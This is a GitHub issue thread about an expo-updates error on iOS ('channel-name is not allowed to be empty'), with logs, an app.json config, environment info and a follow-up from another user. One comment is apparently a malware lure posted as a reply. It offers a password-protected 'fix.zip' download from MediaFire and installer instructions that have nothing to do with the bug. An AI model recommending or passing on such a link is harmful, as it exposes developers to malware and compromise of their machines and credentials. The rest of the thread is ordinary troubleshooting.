### ISSUE TITLE
Channel name is not allowed to be empty [expo-updates]

### ISSUE THREAD

**Issue by 9WW7XxHy** [expo/expo#31216]
### Minimal reproducible example

none

### What platform(s) does this occur on?

iOS

### Where did you reproduce the issue?

in a development build

### Summary

"expo-updates in a bare React Native project" error in all versions  [0.25.22] -> [0.25.24] 

Command: npx expo run:ios --configuration Release

Error: {"timestamp":1724820828000,"code":"JSRuntimeError","message":"EXUpdates:
Could not emit event: name = Expo.nativeUpdatesStateChangeEvent, type = check. Event will
be emitted when the appContext is available","level":"warn"}
[setuprobot] 🟠 {"message":"\"channel-name\" is not allowed to be empty. The headers
\"expo-runtime-version\", \"expo-channel-name\", and \"expo-platform\" are required. They
can also be set with the query parameters \"runtime-version\", \"channel-name\", and
\"platform\". Learn more:
https:\/\/expo.fyi\/eas-update-missing-headers","stacktrace":["
0x0000000102962fd0

i must attach parameters to update url , but it disappears when i update

{
  "name": "setuprobot",
  "displayName": "setuprobot",
  "expo": {
    "extra": {
      "eas": {
        "projectId": "xx"
      }
    },
    "runtimeVersion": "1.0.0",
    "updates": {
      "url": "https://u.expo.dev/xxx",
      "requestHeaders": {
        "expo-channel-name": "production"
      }
    },
    "android": {},
    "ios": {}
  }
}

### Environment

 expo-env-info 1.2.0 environment info:
    System:
      OS: macOS 14.5
      Shell: 5.9 - /bin/zsh
    Binaries:
      Node: 22.2.0 - /opt/homebrew/bin/node
      Yarn: 3.6.4 - /opt/homebrew/bin/yarn
      npm: 10.8.0 - /opt/homebrew/bin/npm
      Watchman: 2024.05.06.00 - /opt/homebrew/bin/watchman
    Managers:
      CocoaPods: 1.15.2 - /Users/nguyentai/.rbenv/shims/pod
    SDKs:
      iOS SDK:
        Platforms: DriverKit 23.5, iOS 17.5, macOS 14.5, tvOS 17.5, visionOS 1.2, watchOS 10.5
    IDEs:
      Android Studio: 2023.3 AI-233.14808.21.2331.11709847
      Xcode: 15.4/15F31d - /usr/bin/xcodebuild
    npmPackages:
      expo: ^51.0.0 => 51.0.31 
      react: 18.3.1 => 18.3.1 
      react-native: 0.75.2 => 0.75.2 
    npmGlobalPackages:
      eas-cli: 11.0.2
      expo-cli: 6.3.10
    Expo Workflow: bare

### Expo Doctor Diagnostics

Warning: Root-level "expo" object found. Ignoring extra keys in Expo config: "name", "displayName"
Learn more: https://expo.fyi/root-expo-object
✔ Check Expo config for common issues
✔ Check package.json for common issues
✔ Check dependencies for packages that should not be installed directly
✔ Check for common project setup issues
✔ Check for issues with metro config
✖ Check for app config fields that may not be synced in a non-CNG project
✔ Check if the project meets version requirements for submission to app stores
✔ Check npm/ yarn versions
✔ Check Expo config (app.json/ app.config.js) schema
✔ Check native tooling versions
✖ Check that packages match versions required by installed Expo SDK
✔ Check for legacy global CLI installed locally
✔ Check that native modules do not use incompatible support packages
✔ Check that native modules use compatible support package versions for installed Expo SDK

Detailed check results:

This project contains native project folders but also has native configuration properties in app.json, indicating it is configured to use Prebuild. When the android/ios folders are present, EAS Build will not sync the following properties: updates, android, ios. 

Advice: Add '/android' and '/ios' to your .gitignore file if you intend to use CNG / Prebuild. Learn more: https://docs.expo.dev/workflow/prebuild/#usage-with-eas-build

Warning: Root-level "expo" object found. Ignoring extra keys in Expo config: "name", "displayName"
Learn more: https://expo.fyi/root-expo-object
(node:42056) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.
(Use `node --trace-deprecation ...` to show where the warning was created)
The following packages should be updated for best compatibility with the installed expo version:
  react@18.3.1 - expected version: 18.2.0
  react-native@0.75.2 - expected version: 0.74.5
  @types/react@18.3.4 - expected version: ~18.2.79
  typescript@5.0.4 - expected version: ~5.3.3
Your project may not work correctly until you install the expected versions of the packages.
Found outdated dependencies

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by landonwjohnson** [comment]
lol I can't believe expo bot closed this out. 

I got this error originally, and once I removed expo updates my app worked, but I actually need expo updates to push to EAS Build. 

I am getting a white screen.
